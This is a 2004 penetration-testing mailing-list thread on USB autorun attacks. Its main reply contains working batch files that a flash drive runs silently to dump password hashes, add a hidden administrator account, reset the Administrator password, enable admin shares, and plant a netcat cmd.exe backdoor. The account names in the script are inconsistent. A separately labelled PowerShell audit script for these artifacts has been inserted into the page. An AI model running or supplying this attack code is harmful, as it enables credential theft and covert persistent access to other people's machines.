Penetration Testing mailing list archives

Re: USB delivered attacks (working example)


From: <mak_pen () hotmail com>
Date: 3 Jun 2004 15:03:11 -0000

In-Reply-To: <BAY15-F11d7KKQpQq5p00043ca6 () hotmail com>

I have been using this "attack" for some time now. Below are the batch files I use (test.bat, b.bat and autorun.inf; 
autorun.inf calls test.bat):

*********<BOF test.bat>
@echo off
@start /min b.bat /B
@exit
<EOF test.bat>


*********<BOF b.bat>
@explorer .
@echo off

::Displaying Computer Information for my reference
@echo %computername% %username% %date% %time% >> Essential\DumpIt\sam.txt
@Essential\DumpIt\pwdump2 >> Essential\DumpIt\sam.txt

::Adding a user for me :o)
@net user /add __system32__ .z,xmcnvb /fullname:"IPC User" 
@net localgroup Administrators _system32_ /add

::Hide the Account from being shown on the welcome screen
@reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v 
"__system__" /t REG_DWORD /d 0 /f

::Enabling Admin Shares
@reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters /v @AutoSharewks /t reg_dword /d 
1 /f

::Changing Admin Password
@net user administrator .;[pl,mkoijnbhu

::Backdooring
@copy nc.exe <nc directory>
@cd c:
@cd <nc directory>
@reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Taskbr" /d "nc directory\nc.exe -L -d -p 
80 -e cmd.exe" /f

@echo MYUSER: __system32__ .z,xmcnvb >> Essential\DumpIt\sam.txt
@echo Changed Admin Pass: .;[pl,mkoijnbhu >> Essential\DumpIt\sam.txt
@echo ******************************************** >> Essential\DumpIt\sam.txt
@cls
@exit
<EOF b.bat>

I have tried this using a flash memory and it works. What happens is that it opens explorer showing the current 
directory so that it hides any shells that might appear, then it does a series of commands which I have documented 
above.

To protect against this I have a registry file I use to disable autorun altogether. Contact me if you need it at: 
mak_pen(at)hotmail(dot)com

Cheers....
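As an added defender-side check that is not part of the original post: the PowerShell script below audits a Windows host for the artifacts the b.bat above leaves behind (an account hidden via SpecialAccounts\UserList, a Run-key entry launching a listener with -e cmd.exe, admin shares forced on under lanmanserver\parameters) and for whether AutoRun is disabled. It assumes PowerShell 5.1 or later on Windows 10/Server 2016+ (for Get-LocalGroupMember) running with administrator rights; the NoDriveTypeAutoRun policy value is a standard Windows setting not mentioned on the page.

```powershell
# Added example (not from the original post): audit a host for the
# persistence artifacts b.bat leaves behind and for the AutoRun policy.
# Assumes PowerShell 5.1+ running as an administrator.
$findings = @()

# 1. AutoRun policy. NoDriveTypeAutoRun is a standard Windows policy value
#    (not on the page); 0xFF disables AutoRun for every drive type.
$policy  = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer'
$autorun = (Get-ItemProperty -Path $policy -Name NoDriveTypeAutoRun -ErrorAction SilentlyContinue).NoDriveTypeAutoRun
if ($null -eq $autorun -or ($autorun -band 0xFF) -ne 0xFF) {
    $findings += "AutoRun is not fully disabled (NoDriveTypeAutoRun = $autorun)"
}

# 2. Accounts hidden from the welcome screen (SpecialAccounts\UserList value = 0).
$userList = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'
if (Test-Path $userList) {
    $key = Get-Item -Path $userList
    foreach ($name in $key.GetValueNames()) {
        if ($key.GetValue($name) -eq 0) { $findings += "Account hidden from logon screen: $name" }
    }
}

# 3. Run-key entries that start a netcat listener handing out cmd.exe.
$runKey = Get-Item -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
foreach ($name in $runKey.GetValueNames()) {
    $cmd = [string]$runKey.GetValue($name)
    if ($cmd -match '(?i)\bnc(\.exe)?\b.*-e\s+cmd') {
        $findings += "Suspicious Run entry '$name': $cmd"
    }
}

# 4. Admin shares explicitly forced on (any AutoShare* value set to 1).
$srv = Get-Item -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters'
foreach ($name in $srv.GetValueNames()) {
    if ($name -match '(?i)AutoShare' -and $srv.GetValue($name) -eq 1) {
        $findings += "Admin shares explicitly enabled via value '$name'"
    }
}

# 5. List current local Administrators so an unexpected account stands out.
$admins = (Get-LocalGroupMember -Group 'Administrators' | Select-Object -ExpandProperty Name) -join ', '
"Local Administrators: $admins"

if ($findings.Count -eq 0) { 'No findings.' } else { $findings | ForEach-Object { "[!] $_" } }
```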


From: "Fred Gravel" <mindedsmasher () hotmail com>
To: pen-test () securityfocus com
Subject: Re: USB delivered attacks
Date: Wed, 02 Jun 2004 20:02:14 +0000
Message-ID: <BAY15-F11d7KKQpQq5p00043ca6 () hotmail com>

And after some search ... autorun is possible on a USB storage device... as 
explained just below ...

http://www.microsoft.com/whdc/device/storage/usbfaq.mspx
Q: What must I do to trigger Autorun on my USB storage device?
If you need to make a USB storage device that executes Autorun, the 
following two conditions must both be true:

- Media must be marked as removable.
- The device can be set to either static or removable.

We associate the "removable" nature of a device with the bus that it resides 
on. This means that a disk on an Integrated Device Electronics (IDE) or SCSI 
bus would be considered fixed, whereas a disk on a USB or IEEE 1394 bus 
would be regarded as removable by default. PnP uses a bit in the 
DEVICE_CAPABILITIES structure to determine this. For more information, see 
the DEVICE_CAPABILITIES Plug and Play Structure in the Windows DDK, located 
at 
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/kmarch/hh/kmarch/k112_22r6.asp.

The "removable" nature of media is a property of the device. For example, in 
the case of a CD-ROM or a ZIP drive, the medium can be removed without the 
device itself going away, but on the other hand the medium and the disk 
cannot be separated on static storage PC cards. We obtain this information 
by using the StorageDeviceProperty request. For more information, see the 
STORAGE_DEVICE_DESCRIPTOR Storage Structure in the Windows DDK, located at 
http://msdn.microsoft.com/library/en-us/storage/hh/storage/k306_00qa.asp.


----
Also the autorun could be used in "cooperation" with the desktop.ini file 
included in the folder(s) on the USB storage device if needed...

